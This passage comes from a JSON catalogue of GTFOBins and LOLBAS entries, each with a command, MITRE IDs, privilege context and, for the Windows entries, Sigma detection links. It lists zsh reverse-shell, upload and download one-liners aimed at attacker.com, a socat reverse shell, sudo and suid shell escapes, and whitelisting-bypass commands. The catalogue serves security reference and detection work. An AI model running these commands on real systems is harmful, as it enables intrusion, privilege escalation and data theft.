/path/to/input-file","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zless/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:download:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:download:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:download:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:1:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:1:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:1:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-write:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-write:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-write:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:inherit:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:inherit:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:inherit:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:reverse-shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:reverse-shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:reverse-shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:upload:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:upload:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:upload:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsoelim:file-read:0:sudo","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsoelim:file-read:0:suid","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsoelim:file-read:0:unprivileged","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:0:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:0:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:1:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:1:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:addinutil-exe:0","toolId":"lolbas:addinutil-exe","toolName":"AddinUtil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe -AddinRoot:.","description":"AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload.","usecase":"Proxy execution of malicious serialized payload","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml"}],"references":["https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html","https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:appinstaller-exe:0","toolId":"lolbas:appinstaller-exe","toolName":"AppInstaller.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source={REMOTEURL:.exe}","description":"AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"}],"references":["https://twitter.com/notwhickey/status/1333900137232523264","https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:applaunch-exe:0","toolId":"lolbas:applaunch-exe","toolName":"Applaunch.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe\" /activate \"{REMOTEURL}#APPLICATION_METADATA_HERE\"","description":"Launches a ClickOnce application via `Applaunch.exe`. Bypasses SmartScreen and default AppLocker rules when the application is published as partial trust.","usecase":"Execute ClickOnce applications in environments where `dfsvc.exe` would normally enforce full-trust and SmartScreen checks. Can be abused as an AWL bypass in rare configurations.","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Applaunch.exe rarely executes unless any ClickOnce partial trusted apps are used. Any use or invocation outside dfsvc.exe with `/activate` should be considered suspicious."}],"references":["https://nathan2.com/posts/clicktools","https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment","https://web.archive.org/web/20060913192623/http://blogs.msdn.com/shawnfa/archive/2005/11/30/498610.aspx","https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:aspnet-compiler-exe:0","toolId":"lolbas:aspnet-compiler-exe","toolName":"Aspnet_Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u","description":"Execute C# code with the Build Provider and proper folder structure in place.","usecase":"Execute proxied payload with Microsoft signed binary to bypass application control solutions","mitre":["T1127"],"privilege":"user","fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml"}],"references":["https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/","https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8","https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:at-exe:0","toolId":"lolbas:at-exe","toolName":"At.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\System32\\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}","description":"Create a recurring task to execute every day at a specific time.","usecase":"Create a recurring task, to eg. to keep reverse shell session(s) alive","mitre":["T1053.002"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/builtin/security/win_security_atsvc_task.yml"},{"type":"IOC","value":"C:\\Windows\\System32\\Tasks\\At1 (substitute 1 with subsequent number of at job)"},{"type":"IOC","value":"C:\\Windows\\Tasks\\At1.job"},{"type":"IOC","value":"Registry Key - Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1."}],"references":["https://freddiebarrsmith.com/at.txt","https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html","https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems","https://lolbas-project.github.io/lolbas/Binaries/At/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:atbroker-exe:0","toolId":"lolbas:atbroker-exe","toolName":"Atbroker.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ATBroker.exe /start malware","description":"Start a registered Assistive Technology (AT).","usecase":"Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml"},{"type":"IOC","value":"Changes to HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration"},{"type":"IOC","value":"Changes to HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"},{"type":"IOC","value":"Unknown AT starting C:\\Windows\\System32\\ATBroker.exe /start malware"}],"references":["http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/","https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:0","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:1","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane\"","description":"Executes a reverse shell","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 